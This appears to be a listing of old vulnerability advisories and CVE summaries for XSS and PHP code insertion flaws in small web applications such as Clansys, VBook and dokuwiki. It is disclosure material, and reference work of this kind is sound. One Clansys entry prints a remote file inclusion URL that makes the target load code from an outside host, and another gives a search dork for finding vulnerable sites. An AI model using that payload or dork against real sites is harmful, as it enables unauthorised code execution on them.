torrentflux -- User-Agent XSS Vulnerability

Steven Roddis reports that User-Agent string is not properly escaped when handled by torrentflux. This allows for arbitrary code insertion...

dokuwiki -- multiple vulnerabilities

Multiple vulnerabilities have been reported within dokuwiki. dokuwiki is proven vulnerable to: arbitrary PHP code insertion via spellcheck module, XSS attack via "Update your account profile," bypassing of ACL controls when enabled...

[Full-disclosure] Advisory: Clansys <= 1.1 PHP Code Insertion Vulnerability.

--Security Report-- Advisory: Clansys = 1.1 PHP Code Insertion Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 23/04/06 21:07 PM --- Contacts: ICQ: 10072 MSN/Email: [email protected] Web: http://www.nukedx.com --- Vendor: Clansys http://www.clansys.de.vu/ Versio...

Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...

Clansys 1.1 - 'index.php' PHP Code Insertion

NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29 Dork: "ClanSys v.1.1" 2.400 pages. Fu...

Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

Exploit for unknown platform in category web applications ================================================================== Clansys GET - http://victim/ClanSysPath/index.php?page=PHPCode EXAMPLE - http://victim/ClanSysPath/index.php?page=&s=http://yourhost.com/cmd.txt? 0day.today 2018-03-19...

Clansys 1.1 - index.php PHP Code Insertion

Clansys 1.1 - index.php PHP Code Insertion NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory:...

[eVuln] N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities

New eVuln Advisory: N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities http://evuln.com/vulns/121/summary.html --------------------Summary---------------- eVuln ID: EV0121 CVE: CVE-2006-1657 CVE-2006-1658 Vendor: Chucky A. Ivey Software: N.T. Sowtware's Web Site: http://www.v-gfx.net/...

[eVuln] [V]Book Multiple Vulnerabilities

New eVuln Advisory: VBook Multiple Vulnerabilities http://evuln.com/vulns/111/summary.html --------------------Summary---------------- eVuln ID: EV0111 CVE: CVE-2006-1561 CVE-2006-1562 CVE-2006-1563 Software: VBook Sowtware's Web Site: http://www.vscripts.pl/?id=vbook2 Versions: 2.0 Critical Leve...

[eVuln] VNews Multiple Vulnerabilities

New eVuln Advisory: VNews Multiple Vulnerabilities http://evuln.com/vulns/112/summary.html --------------------Summary---------------- eVuln ID: EV0112 CVE: CVE-2006-1543 CVE-2006-1544 CVE-2006-1545 Software: VNews Sowtware's Web Site: http://www.vscripts.pl/?id=vnews Versions: 1.2 Critical Level...

[eVuln] QLnews XSS and PHP Code Insertion Vulnerabilities

New eVuln Advisory: QLnews XSS and PHP Code Insertion Vulnerabilities http://evuln.com/vulns/113/summary.html --------------------Summary---------------- eVuln ID: EV0113 CVE: CVE-2006-1575 CVE-2006-1576 Software: QLnews Sowtware's Web Site: http://www.vscripts.pl/ Versions: 1.2 Critical Level:...

EV0080.txt

New eVuln Advisory: M. Blom HTML::BBCode perl module XSS Vulnerabilities http://evuln.com/vulns/80/summary.html --------------------Summary---------------- eVuln ID: EV0080 Software: M. Blom HTML::BBCode Sowtware's Web Site: http://menno.b10m.net/perl/ Versions: 1.04 1.03 and earlier Critical...

CheesyBlog-1.0.txt

New eVuln Advisory: CheesyBlog XSS Vulnerability http://evuln.com/vulns/49/summary.html --------------------Summary---------------- Software: CheesyBlog Sowtware's Web Site: http://cheesepizza.net/ Versions: 1.0 Critical Level: Harmless Type: Cross-Site Scripting Class: Remote Status: Unpatched...

[eVuln] aoblogger Multiple Vulnerabilities

New eVuln Advisory: aoblogger Multiple Vulnerabilities http://evuln.com/vulns/37/summary/bt/ --------------------Summary---------------- Software: aoblogger Sowtware's Web Site: http://mikeheltonisawesome.com/ Versions: 2.3 Critical Level: Moderate Type: Multiple Vulnerabilities Class: Remote...

[eVuln] ACal Authentication Bypass &amp; PHP Code Insertion

New eVuln Advisory: ACal Authentication Bypass & PHP Code Insertion --------------------Summary---------------- Software: ACal Sowtware's Web Site: http://acalproj.sourceforge.net/ Versions: 2.2.5 Critical Level: Dangerous Type: PHP Code Execution Class: Remote Status: Unpatched Exploit: Availabl...

Code insertion in Blogger comments

Having notified Blogger of this twice over the course of a number of months, and not seeing them take any action beyond saying that they'll look at it or warn their users, I think it's time to warn people. Under the following conditions, Blogger weblogs are vulnerable to executable code insertion...

CVE-2004-0875

Multiple cross-site scripting XSS vulnerabilities in Phpgroupware aka webdistro 0.9.16.002 and earlier allow remote attackers to insert arbitrary HTML or web script, as demonstrated with a request to the wiki module...

CVE-2003-1243

Cross-site scripting vulnerability XSS in Sage 1.0 b3 allows remote attackers to insert arbitrary HTML or web script via the mod parameter...

[UNIX] bMachine Cross Site Scripting Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

CVE-2002-2126

restrictEnabled in Integrity Protection Driver IPD 1.2 delays driver installation for 20 minutes, which allows local users to insert malicious code by setting system clock to an earlier time...